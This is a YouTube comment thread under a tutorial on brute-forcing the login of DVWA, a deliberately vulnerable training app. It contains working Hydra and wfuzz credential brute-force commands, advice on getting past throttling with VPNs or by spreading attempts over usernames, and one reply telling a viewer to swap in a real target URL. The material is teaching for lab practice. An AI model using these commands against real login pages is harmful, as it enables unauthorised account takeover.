UPDATE: I noticed that a GitHub issue was created, showing how to solve DVWA brute force with Hydra. It turns out the command was OK, but hydra 9.1 (used in the video) had a bug which prevented it from working - github.com/vanhauser-thc/thc-hydra/issues/612
@lextorn92
Жыл бұрын
I was struggling with hydra also. In newest hydra I got a little bit different behavior (error message) but I found the problem. I tried with version 9.1 that you used as well, and I think it's the same problem. Parameter that distinguishes successful attempts from failures MUST be last in the command line, so this works even with hydra 9.1: ./hydra -l admin -P SecLists/Passwords/500-worst-passwords.txt 172.17.0.2 "http-get-form" "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: PHPSESSID=qvthc81qv13c9eq5vl2nd8oif7; security=low:incorrect" -I It is really confusing, and information about this is not clear at all. In latest hydra you can find a note in source code: hydra-http-form.c.
@timholtz5590
2 жыл бұрын
Thank you for leaving in the try and fail section! Often times the most important thing for a beginner is to learn the thought process. Great tutorial
@_CryptoCat
2 жыл бұрын
thanks mate 🥰 i was tempted to take it out to reduce the total video time. good to hear it can provide some benefit 😊
@morningwood3938
2 жыл бұрын
This.
@tapankamath
2 жыл бұрын
That Hydra issue had me on the ropes! Thanks for showcasing it so thoroughly m8! And especially for not cutting the errors you made, got to learn quite a bit through those! Amazing vid!!
@_CryptoCat
2 жыл бұрын
thanks mate! 🥰 glad i didn't cut the struggle now as a few people have said it helped 😅
@wisdomovermoney3394
2 жыл бұрын
It's a progression.
@manitouphon7618
2 жыл бұрын
Thanks a lot for the hydra part, m8. I was literally pulling my hair off until I watched this video and realized that hydra has a bug...
@Hardikpatel-or2mc
3 жыл бұрын
Nice tutorial and that wasn't waste of time(interesting behind the scenes 😜) Keep up the good work mate!
@cybershorts7486
2 жыл бұрын
Subscribed! Amazing work bro can't wait to finish this series !
@_CryptoCat
2 жыл бұрын
awesome! thanks mate 😊
@janwrona9539
Жыл бұрын
Love this sarcasm in your voice about "just use Burp instead of Hydra" :D
@_CryptoCat
Жыл бұрын
haha xD I've only used hydra a handful of times since this making video. Mostly use gobuster and ffuf for web and crackmapexec where possible for other protocols.
@zenoweed
3 жыл бұрын
I loved this. So many mistakes to learn from too. We are in this together :))))))
@_CryptoCat
3 жыл бұрын
thanks mate 🥰
@ParitaPatel-i8n
Жыл бұрын
Thank you for the video. I was able to resolve the setup issue.
@hasnainmalik8982
Жыл бұрын
Bro i face the same problem.. but thank for sharing your errors too.. i became your subscriber because of this video ❤
@_CryptoCat
Жыл бұрын
Awww thanks mate! Welcome 🥰
@mariyasaify4326
16 күн бұрын
For the csrf token one, mine is not working, the password shows incorrect
@CypherX-Sec
5 ай бұрын
thank bro love from India
@wuyaxu8529
3 ай бұрын
Hey, Very great video. On the issue of Hydra maybe adding "F=Username and/or password incorrect.:" could solve the problem? I can perfectly bruteforce the password using hydra.
@bharathnaidu107
2 жыл бұрын
a user_token was being generated each time we send a request. Can you please tell me more on that? Was user_token was generating on client side? Thanks for the knowledge you are sharing ❤️.
@_CryptoCat
2 жыл бұрын
think i spoke to you on LinkedIn already but just going to reply here in case others are interested; it's been a while since I looked at dvwa but assuming it was a CSRF token that was generated server side. i did a video on DVWA CSRF but it is TERRIBLE lol 😆 it was towards the end of this video series (which i recordered over a weekend with no prep). I would recommend checking out portswigger.net/web-security/csrf/tokens to learn more about CSRF. The portswigger material and labs are excellent in general and provide a lot more to learn than DVWA. Great thing to move onto after DVWA to solidify your understanding and learn more advanced techniques 😉
@ninjanape
Жыл бұрын
thank you very much! big help :D
@_CryptoCat
Жыл бұрын
🙏🥰
@georgiana5937
6 ай бұрын
i seem to not have permission to the hackable/users folder. i get a 403 forbidden error in browser when accessing that resource. do you have any idea how to fix it?
@_CryptoCat
6 ай бұрын
Hey, check some of the issues/docs on their github: github.com/digininja/DVWA/issues/149
@anirudhsaxena9214
Жыл бұрын
From where can we access that password list?
@_CryptoCat
Жыл бұрын
Kali Linux and Parrot OS should have some included e.g. rockyou in /usr/share/wordlists. You can also download some, e.g. from seclists: github.com/danielmiessler/SecLists
@iangraham6730
2 жыл бұрын
For some reason, when fuzzing I would get a duplicate of each name with the same password -> " #1bitch " lol But I still got the proper pwd's along with them.. Enjoying the video btw!
@AccessWorld-y3p
Жыл бұрын
good information
@_CryptoCat
Жыл бұрын
🙏🥰
@SupremeNoble
11 ай бұрын
Hey there! Amazing tutorial so far, I got all the way to High Security level before I got stuck. so I'm doing it on Windows 11, I'm not sure if that's relevant or not. But the first problem I encountered to follow your tutorial at High level was, when I wanted to start the attack, it would tell me I can't use multiple threads when using recursive grep. Luckily I figured a fix for that by making a new custom resource pool with only 1 maximum concurrent requests. Now it can start attacking but I've run into another problem immediately, my first request, which sends the first password in the file correctly, always sends with a blank user_token value. this results in the subsequent attack requests sending parts of the error message instead of proper values. Any idea on what could be the problem?
@_CryptoCat
11 ай бұрын
Hmmm which tool are you using? Maybe try another (hydra, wfuzz, ffuf, burp etc) or even make your own python script!
@NoLaSoulja86
2 ай бұрын
Where are we getting the list of passwords from, did I miss something
@_CryptoCat
2 ай бұрын
If you are using Kali or Parrot OS, there's wordlists in /usr/share/wordlists/ you can also install seclists either using "sudo apt-get install seclists" or download via github: github.com/danielmiessler/SecLists
@srns25
2 жыл бұрын
I tried using a password list and started the attack. But the length is not varying which is 300 for all the passwords, all my configurations are right, is there anything I can do to fix this?
@_CryptoCat
2 жыл бұрын
what tool are you using? been a while since i did this but maybe try and filter by regex instead of length e.g. hide responses that contain the word "incorrect". if you are using wfuzz, you could also try to filter by number of chars, instead of number of lines/words 😉
@srns25
2 жыл бұрын
Thanks for your response. I just realized that I had the DVWA set to high security level and that was the reason it dint work . Your videos are extremely gooddd. Im trying to use hyrda as well but im getting a parsing error coz of using '&' . I haven't tried to fix it yet though.
@_CryptoCat
2 жыл бұрын
@@srns25 no problem! best of luck with the remaining levels 😉 if you don't get hydra working you can DM me on twitter i'll try to help 🙂
@PastEventsTV
2 жыл бұрын
Hi ,how can use this in actual url
@_CryptoCat
2 жыл бұрын
well it depends on the URL, this is an intentionally vulnerable web application so there are minimal security protections (throttling/CSRF etc). if the URL you want to test is also missing security protections, then a similar attack would work i.e. just swap the URL for the one you are targetting 😀
@PastEventsTV
2 жыл бұрын
Thanks..let's assume I have a url , so where should I swap i didn't get it bro
@_CryptoCat
2 жыл бұрын
@@PastEventsTV you would replace the URL i use in the video, with the URL you are targetting 😆 if you dont understand where the URL goes, plz rewatch the video 😉
@PastEventsTV
2 жыл бұрын
@@_CryptoCat gotcha man ! Thanks
@ikhsansdq
8 ай бұрын
Hi, great video btw. Just wondering how do we even know which combination of username and password in medium settings using throttling?
@_CryptoCat
8 ай бұрын
Thanks! It's been a long time since I made these but I think some usernames were provided, either in this lab or one of the others (e.g. SQL injection). For passwords I'd just use a common list.
@ikhsansdq
8 ай бұрын
@@_CryptoCat Just figured it out several hours ago, it is very helpful actually your tutorial for me to do ethical hacking. Thank you , appreciate it bro
@_CryptoCat
8 ай бұрын
@@ikhsansdq Awesome! No problem mate 👊
@TVVDINAKARAN
3 жыл бұрын
When ever i try to do wfuzz it shows me this error "UserWarning:Fatal exception: Error opening file. [Errno 2] No such file or directory:" I have got the wordlist file in Desktop and execute the wfuzz command from desktop only, But it still shows me an error. Please help
@_CryptoCat
3 жыл бұрын
hey, make sure you providing the '-w' flag before the wordlist. if you try to print the wordlist out from the terminal (same directory/filename) does it work?
@TVVDINAKARAN
3 жыл бұрын
@@_CryptoCat No it doesnt work I tried it, and there is also an error known as pycurl3
@_CryptoCat
3 жыл бұрын
@@TVVDINAKARAN i get that pycurl SSL error as well, dont worry about that. try and re-order your command as well, make sure the URL is the last parameter provided. also, i played around with wfuzz and ffuf recently and i would personally recommend using ffuf instead of wfuzz 😉 - kzitem.info/news/bejne/r2eM26aGj2KkY6Q
@TVVDINAKARAN
3 жыл бұрын
@@_CryptoCat Thanks mate I will look into it
@jokubassodaitis4162
3 жыл бұрын
very nice and informative video! Can you help m ewith the word list I can't find one.
@_CryptoCat
3 жыл бұрын
thanks mate! rockyou.txt should come with kali/parrot (/usr/share/wordlists) and i would also recommend seclists (sudo apt-get or github: github.com/danielmiessler/SecLists). aside from that i use the crackstation/haveibeenpwned wordlists, you can find on the websites / google 😉
@jokubassodaitis4162
3 жыл бұрын
Thank youuuu!!!
@stingray3565
2 жыл бұрын
With a different seclist wordlist, wfuzz gives a lot of fals positives. Have you come across this issue?
@_CryptoCat
2 жыл бұрын
which ones are coming up false positive? starting with a # maybe?
@stingray3565
2 жыл бұрын
@@_CryptoCat Sorry, been away for abt 2 weeks, n I don't recollect which ones they were.
@wisdomovermoney3394
2 жыл бұрын
So what was the problem with brute force through hydra? Is it a bug in the tool, or a command misconfiguration?
@_CryptoCat
2 жыл бұрын
I think it was due to a bug with the hydra version, which kali (and probably parrot) haven't updated still. There's some GitHub issues about it: github.com/vanhauser-thc/thc-hydra/issues/612
@wisdomovermoney3394
2 жыл бұрын
I got the same problem with a WordPress login attack. The problem got solved when I placed part of the error message instead of the full one. I am about to try hydra on the dvwa on the brute force challenge, but according to the article shared by you, my version of hydra (9.1) has a bug and does not work. Time to check.
@wisdomovermoney3394
2 жыл бұрын
Using hydra 9.1 on Ubuntu failed. The hydra 9.2 worked, but only when using the success message, instead of the error one. So the full working command is: sudo hydra -l admin -p password 'http-get-form://127.0.0.1/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome:H=Cookie:welcomebanner_status=dismiss; cookieconsent_status=dismiss; language=en; continueCode=mJBpEKkqbOJZnP15M3Legajov80bmTEirnG2YWDymNRV4xwz6pXlQ9Br7WDO; PHPSESSID=osb4ad9nogmtk8t6r4ugahg2qt; security=low'
@KK-yv4ku
Жыл бұрын
First of all must say that i really love your videos! You are the best! About the hydra topic, i was able to harvest all credentials with this: hydra localhost http-form-get "/dvwa/vulnerabilities/brute:username=^USER^&password=^PASS^&Login=submit:H=Cookie:security=low; PHPSESSID=i0n9avk1tr136munuo7vuac6kp:F=Username and/or password incorrect." -L /home/kenny/users.txt -P /usr/share/wordlists/rockyou.txt Being users.txt the ones harvested before and the PHPSESSID mines. Get the 5 of theme really quick. Thank, love you bro.
@_CryptoCat
Жыл бұрын
Awww thank you! Great job 👏
@omarataallah9451
3 жыл бұрын
is it worthily if you have to brute force a login form but it include a captcha 🙂 ?
@_CryptoCat
3 жыл бұрын
depends on the captcha tech but unless its really basic e.g. provide answer to basic math equation it would be a challenge. if captcha is using image recognition youd need to integrate some machine learning based solution into your brute force script 😆 theres probably some tools out there to integrate though 😉
@alirezafathi8178
2 жыл бұрын
great video . how we can implement csrf token part with out using burp?
@_CryptoCat
2 жыл бұрын
My preferred option would probably be a python script using BeautifulSoup e.g. stackoverflow.com/a/28292151
@EdwinDeJesus-w6i
11 ай бұрын
@@_CryptoCatdo you run this script in Kali python
@_CryptoCat
11 ай бұрын
@@EdwinDeJesus-w6i I'm using Parrot OS, but yeh Kali should be fine too ☺
@noyaljose2745
2 жыл бұрын
let's say the password of the site was in 30000th position and we're throttled to 2 sec between trying new passwords. In that case it'd take 10 hour plus for us to get the password. Is there any way to overcome this? I felt everyone's approach on the medium difficulty was flawed.
@_CryptoCat
2 жыл бұрын
good question! a few thoughts: - ensure password list is ordered according to most commonly found passwords - if the website has a password policy, you can filter out invalid passwords from the wordlist - if the throttling is IP based, you could work use VPNs and distribute the attack - if throttling is user account based, you can distribute the attack across usernames TLDR; depends on the password list and the throttling implementation but sometimes it will just take a really long time, other times you won't crack it at all.
@noyaljose2745
2 жыл бұрын
@@_CryptoCat i didn't expect such a fast reply. Thanks a lot for all these suggestions
@iankimca
2 жыл бұрын
for wfuzz, i couldn't get my cookie to filter out the 200 response. My PHPSESSID is different from yours
@_CryptoCat
2 жыл бұрын
PHPSESSID should be different each time, try to insert yours in wfuzz 😉
@iankimca
2 жыл бұрын
@@_CryptoCat i did and it printed out 3 thousand some values. How do i filter out the 200 responses?
@_CryptoCat
2 жыл бұрын
@@iankimca -hc 200 will Hide Code 200. you can also use -hl, -hw, -hh to hide lines/words/chars (response size) 😉
@iankimca
2 жыл бұрын
@@_CryptoCat ok i used --hc 302 to hide failures but it printed out hundreds of other responses. I used -sw 248 like in the video to show successes but nothing prints out for me. I think my successful words are different from 248. Any thoughts on how I should proceed?
@_CryptoCat
2 жыл бұрын
@@iankimca Hi mate, unless you *know* the correct number of words for a successful login is 248, i would use "hide words" (hw) instead of "show words" (sw) e.g. if incorrect login is 420 words, use -hw 420.
@sherman8r1998
3 жыл бұрын
I cant get hydra cracking DVWA either. Looked at countless amounts of tutorial vids, so annoying lol
@_CryptoCat
3 жыл бұрын
yeh this was so frustrating! ive boycotted hydra ever since this video 😅
@jonasverkaap4054
Жыл бұрын
Hello, Im a windows user and i want to know if i can get wfuzz on my windows system and how. Do you know how it works?
@_CryptoCat
Жыл бұрын
wfuzz is python-based so if you install python, you could use wfuzz on windows. Check this: wfuzz.readthedocs.io/en/latest/user/installation.html#pycurl-on-windows
@jonasverkaap4054
Жыл бұрын
@@_CryptoCat thanks!
@MM-sl1nq
Жыл бұрын
you only needed to make DVWA in the url in capital letters and it should work
@_CryptoCat
Жыл бұрын
🤔
@unknownuser7776
Жыл бұрын
Can you solve impossible
@_CryptoCat
Жыл бұрын
You shouldn't be able to solve it 😁 If you find a way you can report to the creator 😉
@StephenMolloyGoogle
3 жыл бұрын
Could the security=high be done using wfuzz?
@_CryptoCat
3 жыл бұрын
not that im aware of! i dont think youll be able to grab the CSRF token with wfuzz.
@StephenMolloyGoogle
3 жыл бұрын
@@_CryptoCat Probably. I might try a python script. Just to avoid burp suite 😊
@_CryptoCat
3 жыл бұрын
@@StephenMolloyGoogle probably the best bet unless you have burp suite pro.. the throttling on intruder can be a real nightmare so i would recommend a custom script normally (assuming ffuf cant do the job), also good opportunity to build coding skills 😀
@morningwood3938
2 жыл бұрын
Man,- I love your videos. I just wish you did not smack your lips all the time like that, loool !!! :D
@_CryptoCat
2 жыл бұрын
yeh haha im sorry bro! it took me a while but i think i'm getting there, same with the microphone static/pops. some of the video/audio quality in my earlier videos is super cringe xD
@ijayilumumba6012
3 жыл бұрын
for this, must i use LInux?
@_CryptoCat
3 жыл бұрын
it will be possible without it but linux will be easiest for installing/configuring DVWA and all the relevant tools. something like kali linux / parrot os will be ideal!
@ijayilumumba6012
3 жыл бұрын
@@_CryptoCat Thank you!
@luizlucioandrade
Жыл бұрын
eu não consegui acar o endereço deste sit tem como voce colocolar o http do sait
@_CryptoCat
Жыл бұрын
Obrigado por me lembrar, o endereço atualmente na descrição foi comprado por golpistas :( Vou atualizá-lo agora com o repositório oficial do github: github.com/digininja/DVWA
@JohnSmith-wp6xm
2 жыл бұрын
I tried exactly what you did but put http-get-form and it worked for me
@_CryptoCat
2 жыл бұрын
nicely done!
@Daftronic
Жыл бұрын
Hydra is really shitty, it never find the password in multiples différents scenarios with all the syntax correct instead of Burp which find it every time.
@_CryptoCat
Жыл бұрын
Yeh, I rarely ever use hydra these days! ffuf for web stuff (burp is great, but slow if you don't have pro version) and crackmapexec for most other protocols 🙂
@gurusarena1185
3 жыл бұрын
How can I connect with you bro
@_CryptoCat
3 жыл бұрын
hey i have some social media links listed on the main channel 😀
@gurusarena1185
3 жыл бұрын
@@_CryptoCat okay thanks
@gurusarena1185
3 жыл бұрын
@@_CryptoCat I have sent you a message on Twitter, also I connect you on LinkedIn
@allenpreece
2 ай бұрын
Dud! Keep it simple. Youre picking things to show at random without even showing the password attack completes. Relax man. Start showing us something and follow through with it instead of running to something else.
@phuc_cuhp
Жыл бұрын
dude, for the Low level, you should have used the "Cookie\:" instead of "Cookie:"
@mitulshah5594
3 жыл бұрын
bro you don't use insta
@_CryptoCat
3 жыл бұрын
instagram? not for cybersecurity related stuff 😆 mostly just youtube + twitter, a little bit of reddit 😀
@Solomonrajvallepu
2 жыл бұрын
frustrating while listening your voice in a headset; for each word you say, you are taking down your saliva with that word.
@_CryptoCat
2 жыл бұрын
yeh im sorry bro, these early videos were put together with little preparation or editing - basically an upload of me livestreaming the challenges. im actually surprised these videos get so many views considering the audio quality, small fonts etc. ive got better at making (and editing) videos now so if you check some of my recent uploads hopefully you will notice a big difference. maybe i will go back one day and re-record the DVWA series as it is quite popular, but atm i dont have the time unfortunately. apologies! 💜
@ReturnTypeVoid
2 жыл бұрын
@@_CryptoCat There is nothing wrong with the sound in the video and there is absolutely no need to re-record. A simple thank you for your time and effort is what I think he was supposed to say. In the words of Alfred Pennyworth, "Some men aren't looking for anything logical, like money. They can't be bought, bullied, reasoned, or negotiated with; some men just want to watch the world burn."
@_CryptoCat
2 жыл бұрын
@@ReturnTypeVoid Thanks mate 🥰 The audio is definitely a bit hit and miss compared to my recent videos but you're right, I take the time to make and publish these videos for free in case it can help others.. If it doesn't, or the quality isn't good enough.. Just don't watch it 😂
@ifrit4449
2 жыл бұрын
i gotta dislike my dude
@_CryptoCat
2 жыл бұрын
Well thanks for letting me know! Any feedback on why you dislike?
@DAILYHIJACKS
3 жыл бұрын
GREAT EXPLAINATION FOR NEWBIES .... I WONDER Y ARE YOU STILL NOT FAMOUS !!!! LET'S CONNECT ON SOCIAL MEDIA
@chirpieful
3 жыл бұрын
Seems like hydra can only work on the /dvwa/login.php
@LucassenR
2 жыл бұрын
This might be a late reaction, but you need Hydra version 9.2 or higher for this to work.
@chirpieful
2 жыл бұрын
@@LucassenR thanks for the info!
@rammyfzl
3 жыл бұрын
You needed to add the ':F=' (for failure I presume) after the form data and before the failure message. So it would look similar to this: hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-get-form "/vulnerabilities/brute/:username=admin&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=[YOUR PHPSESSID]; security=low" -V See example pasteboard.co/K1omrQY.png
@_CryptoCat
3 жыл бұрын
hmmm thats interesting and cool you got it working! 😎 when i made this video i hadnt used hydra in a couple of years (since OSCP) but none of the commands in my notes specify the ":F" part, they just look like: '...http-post-form "/login:username=^USER^&password=^PASS^&submit=Login:Login failed' and always worked without issues. looking at the hydra documentation now, the only thing i can see about "F" option is that it will end the fuzzing once it finds a correct password. that being said, i cant find any github code for hydra, is the project even active anymore? 🤔
@rammyfzl
3 жыл бұрын
@@_CryptoCat I believe you're right, my notes do not mention the 'F' option either. If I figure out that mystery I'll be sure to share. The github project can be found here: github.com/vanhauser-thc/thc-hydra
@_CryptoCat
3 жыл бұрын
ooo ok yeh so looking at the code comments it should use the failure message by default if you dont specify F or S - "By default, if no header is found the condition is assume to be a fail" - github.com/vanhauser-thc/thc-hydra/blob/master/hydra-http.c. looking elsewhere on the github it seems the original issue was addressed: github.com/vanhauser-thc/thc-hydra/issues/612
Пікірлер: 138